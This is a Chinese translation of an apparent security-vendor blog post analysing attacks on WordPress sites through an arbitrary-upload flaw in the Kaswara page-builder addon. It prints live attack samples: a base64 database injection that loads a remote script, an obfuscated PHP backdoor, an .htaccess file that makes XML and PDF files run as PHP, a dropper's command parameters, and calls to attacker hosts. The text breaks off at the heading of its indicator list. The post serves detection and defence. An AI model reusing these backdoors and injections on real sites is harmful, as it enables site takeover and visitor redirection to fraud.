易受攻击的 Kaswara 现代 WPBakery 页面生成器插件插件在野外被利用

早在 2021 年 4 月 20 日，我们在 WPScan 的朋友报告了 Kaswara Modern VC Addons（也称为 Kaswara Modern WPBakery Page Builder Addons）的一个严重漏洞。 Codecanyon/Envato 不再提供此功能，这意味着如果您运行此功能，则必须选择替代方案。

此漏洞允许未经身份验证的用户将任意文件上传到插件的图标目录（./wp-content/uploads/kaswara/icons）。 这是我们在 WPScan 的朋友在他们的报告中与我们分享的第一个妥协指标 (IOC)。

将任意文件上传到网站的能力使不良行为者可以完全控制该网站，这使得很难定义这种感染的最终有效载荷； 因此，我们将向您展示到目前为止我们发现的所有内容（我们对研究有点忘乎所以，如果您不想通读，请随意跳到 IOC 部分）。

数据库注入、伪造的 Android 应用程序和其他后门

感谢我们来自 Sucuri 的朋友 Denis Sinegubko 指出了用于这次攻击的数据库注入后续操作。

不良行为者会更新“kaswara-customJS”选项以添加任意恶意 Javascript 代码片段。 这是我们发现的一个例子：

INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1856,'kaswara-customJS',
'dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoXCdzY3JpcHRcJyk7CnNjcmlwdC5vbmxvYWQgPSBm
dW5jdGlvbigpIHsKfTsKc2NyaXB0LnNyYyA9IFwiaHR0cHM6Ly9ldmFkYXYubGluay9zY3JpcHQuanNcIjsKZG9jdW1lbnQu
Z2V0RWxlbWVudHNCeVRhZ05hbWUoXCdoZWFkXCcpWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk7','yes');

这个 base64 编码的字符串转换为：

var script = document.createElement(\'script\');
script.onload = function() {
};
script.src = \"hxxps://evadav[.]link/script.js\";
document.getElementsByTagName(\'head\')[0].appendChild(script);

就像这种类型的脚本通常发生的那样，它会链式加载一系列其他 Javascript 代码片段，最终的有效负载将是恶意广告或漏洞利用工具包。 这与 Wordfence 在这里报告的非常相似。

在这种情况下，脚本会在 hxxp://double-clickd[.]com/ 上死掉，并且不会加载任何不良内容。 我发现自 2020 年初以来调用此站点的可疑 Javascript 代码，自 2018 年以来人们已经阻止了它。

假应用程序上传到网站

在我们检查的网站上发现的 40 个 Android 应用程序是不同应用程序的假版本，例如支付宝、PayPal、Correos、DHL 和许多其他应用程序，幸运的是，根据这项 VirusTotal 分析，最流行的防病毒供应商检测到了这些应用程序。

我没有检查应用程序的意图，但快速查看它请求的权限可以让我们大致了解它可以做什么：

• android.permission.WRITE_SMS
• android.permission.RECEIVE_SMS
• android.permission.FOREGROUND_SERVICE
• android.permission.KILL_BACKGROUND_PROCESSES
• android.permission.READ_CONTACTS
• android.permission.READ_PHONE_STATE
• android.permission.READ_SMS
• android.permission.ACCESS_NETWORK_STATE
• android.permission.QUERY_ALL_PACKAGES
• android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
• android.permission.INTERNET
• android.permission.SEND_SMS
• android.permission.CALL_PHONE
• android.permission.WAKE_LOCK
• android.permission.REQUEST_DELETE_PACKAGES

不过，这些文件不会立即使用 Kaswara 漏洞上传。 网站被入侵后，攻击者将首先上传其他工具以完全控制该网站。

上传的文件

在受此漏洞影响的网站上还发现了一些后门和其他恶意软件。 我将在这篇文章中分享对最受欢迎和最有趣的内容的快速分析。 但是，我想首先关注最复杂的一个。

重定向和伪造应用程序

我在几个受感染网站上发现的虚假应用程序不是通过利用 Kaswara 漏洞上传的。 它们正在使用多功能黑客工具上传到该站点，该工具允许攻击者上传一些远程代码（通过提供 URL 或字符串），并将用户重定向到恶意站点。

通过此字符串的存在可以轻松识别该文件： base64_decode('MTIz');error_reporting(0); 功能

有趣的是，它随机化了除此之外的所有内容。

该恶意软件位于一行中，如果您正在寻找这种类型的代码异常，这也是一个有趣的 IOC。

为了便于理解，我对大部分代码进行了解码，对有趣的函数进行了重命名，并对代码进行了美化。 该恶意软件包含 6 个不同的函数，其中 5 个基于$_GET['ts']变量上传递的值。 对于本文档，让我们考虑一下我发现的众多实例之一： c.php 。

/c.php?ts=kt

这没有任何作用，它会强制网站返回 500 错误（稍后在代码中）。

/c.php?ts=1

将$q1a标志值更改为 true 以执行代码验证并向攻击者输出 OK 消息。

在这种情况下，远程站点回答： {"body":"","headers":["Location: http:\/\/good-valid-1"],"status":302,"contentType":""}

/c.php?ts=sv&v=”代码”&p=40bd001563085fc35165329ea1ff5c5ecbdbbeef

只要$_GET["p"]的 SHA1 校验和为123 ，就使用$_GET["v"]的内容提供的代码在服务器上写入文件（还记得base64_decode('MTIz')第一个 IOC 吗？这个是校验和）。

/c.php?ts=tt

在服务器上写入 5 MB 的“-”，可能用于测试上传功能是否可以在服务器上工作。

/c.php?ts=dwm&h=HASH1,HASH2

当恶意软件收到此请求时，它会执行测试以验证上传的文件是否已成功写入服务器。 它们的 MD5 哈希值必须是已知的，并以逗号分隔值的形式发送到$_GET['h']变量。

/c.php?ts=dw&h=hash&l=URLs_as_CSV

从一系列第三方网站下载文件并将其保存在服务器上，以下载文件的 md5 的最后 12 个字符命名。

这是用于将虚假应用程序上传到服务器的功能。

下面是下载恶意文件的请求示例/c.php?ts=dw&h=7e7bcc10406f3787b0a08d4199e6a697&l=http%3A%2F%2Fsmurfetta.ru%2Fhash-de%2F%3Fh%3D7e7bcc10406f3787b0a08d4199e6a697

重定向访问

如果选择了kt选项或未选择选项，则代码继续进行重定向，这是通过请求带有所需数据的 JSON blob 来实现的。 然后它继续使用标头函数重定向访问者。

响应如下： {"body":"","headers":["Location: https:\/\/stunningawards.life\/?u=yuek60p&o=2k5p1e0&m=1"],"status":302,"contentType":""}

使用所需参数执行 cURL 请求的函数是这样的：没什么特别的……

它可以翻译成这个 cURL 请求：

curl -X POST hxxp://papass[.]ru/click_api/v3 \
    -H 'X-Forwarded-For: 200.171.221.1' \
    -H 'Accept-Language: *' \
    -H 'User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.0 Chrome/87.0.4280.141 Mobile Safari/537.36' \
    -d 'token=hmfovdqs9vfxp8s4rwqzxbfz6c43bwgb&force_redirect_offer=1&sub_id_1=dbhomeworkout.com&sub_id_2=dbhomeworkout.com&sub_id_3=dbhomeworkout.com&sub_id_4'

据我测试，最终 URL 是随机的，但与流行服务或应用程序的虚假页面具有相同的特征。

wp-content/uploads/kaswara/icons/16/javas.xml 和 wp-content/uploads/kaswara/icons/16/.htaccess

XML 文件通常不会被标记为潜在威胁，但在这种情况下，我们有一个特制的 .htaccess 文件，它会改变网络服务器对它的看法：

Order Deny,Allow
Allow from all

<FilesMatch "_?(javas|homes|menus)\.(php|xml|pdf)\d*$">
    AddHandler application/x-httpd-php .xml .pdf
    AddType application/x-httpd-php .xml .pdf
    # ---
    SetHandler application/x-httpd-php
    ForceType application/x-httpd-php
    # ---
    php_value engine 1
    # ---
    Order Deny,Allow
    Allow from all
</FilesMatch>

事实上，它告诉 Apache 将任何带有 xml、php 或 pdf 的 javas、homes 或 menus 文件作为 PHP 文件进行相应处理和执行。 因此，与此 .htaccess 位于同一目录结构中的任何文件都是可疑的。

javas.xml 文件与上传到该站点的其他一些恶意文件相同。 我发现不同之处在于有些文件末尾有一两个空行，这使得传统的散列有点棘手。

<?php
$LnWYZK 	  	="\163"."\164" 	 ."\162\137\162\157"	 	.	 	"\164"	. 		  (		 279	 	-  			266)	 	  ; 	 	 if( !empty		 	 (	$ { 	 $LnWYZK	   	
("\137"	.	"\103\102\106" 		 	.		 "\107")}	) 	 		)  			{  	 			 $nNZph 	 =$LnWYZK		 (	 		 "\172". 		"\161". 	(4334	 	
-4329	)		   	 	)			  ; $ouQLkV  	 	= $LnWYZK		 (	 	 	"\157\156"  	.  	"\146" .		 "\162"	.		  	 (	  9680	 	-	  9616)  	 . "\137" 		
. 		"\161"   		.   		"\162\160\142\161\162" 	 ) 		  ; 			  $VNfzSD  	 	=$LnWYZK("\160\145\162"."\156\147\162\137\163\150\141\160"	
. "\147\166\142\141" 			 ); 	  	foreach	($			  { 	 	 $LnWYZK(			  "\137".	 	"\103"  	.	  		"\102" . 			 "\106"	 	. 		"\107" 	 		
)  			}	  as	$IKRDzf   		=>	$NIvHUr	  )( 	  	$nNZph  			(	   	$IKRDzf  	)  	===	 	  		 "c"	  .  (2668 - 	  	2626	 		 )   			.   		
"\145\141"   		."\71"		   .  			"\67"	."\71\145\144"	 	.	  "\71\70\62"	.  	"\143\60" 	 . 	 	 	(314406	  -51163		 )	 	 	. "\60" 			 
.	"\145" 	 . 			 "\71" 	 .		   "\145" . "\71"	  		.	"\70"	  	 .			  "\141"	  		.	 	"\66" . 		"\66"	.	"\144"		  	.    		( 	  	9786	-		 	 
9780 		) 		  		 	&&  	$QZCMY	 		 =	 	  $VNfzSD( ""  			, 	 $ouQLkV (  	$NIvHUr)   		)  	) 		 		 	 	?$QZCMY 	 () : " 		"		  	
;  	}

恶意代码使用 str_rot13 和 base64 编码字符串进行模糊处理。 它还使用十六进制值和数学运算来更多地隐藏字符串。 最终的有效负载是未知的，因为它将根据 POST 请求的值创建一个函数。 但是，有效负载似乎每次都相同，因为它在创建之前依赖于 md5 检查（c42ea979ed982c02632430e9e98a66d6 是 md5 哈希）。

结论

由于这是一个活跃的活动，在撰写本文时，我们发现越来越多不同的恶意软件示例被丢弃在受影响的站点中。 有些只是我们这里的变体，而另一些则足够有趣，可以进行更深入的分析。 寻找即将发布的一些较小的帖子，以探索其中一些其他示例。

这说明了使用最新的安全修复程序更新您的扩展程序的重要性； 如果开发人员没有及时发布修复程序或者它从 WordPress.org 存储库（或其他市场）中删除，我们强烈建议您找到更安全的替代方案。

如果您担心网站的恶意软件和漏洞，请查看 Jetpack 的安全功能。 Jetpack Security 提供易于使用、全面的 WordPress 站点安全性，包括备份、恶意软件扫描和垃圾邮件防护。

妥协指标

在这里您可以找到我们确定的所有 IOC 的完整列表：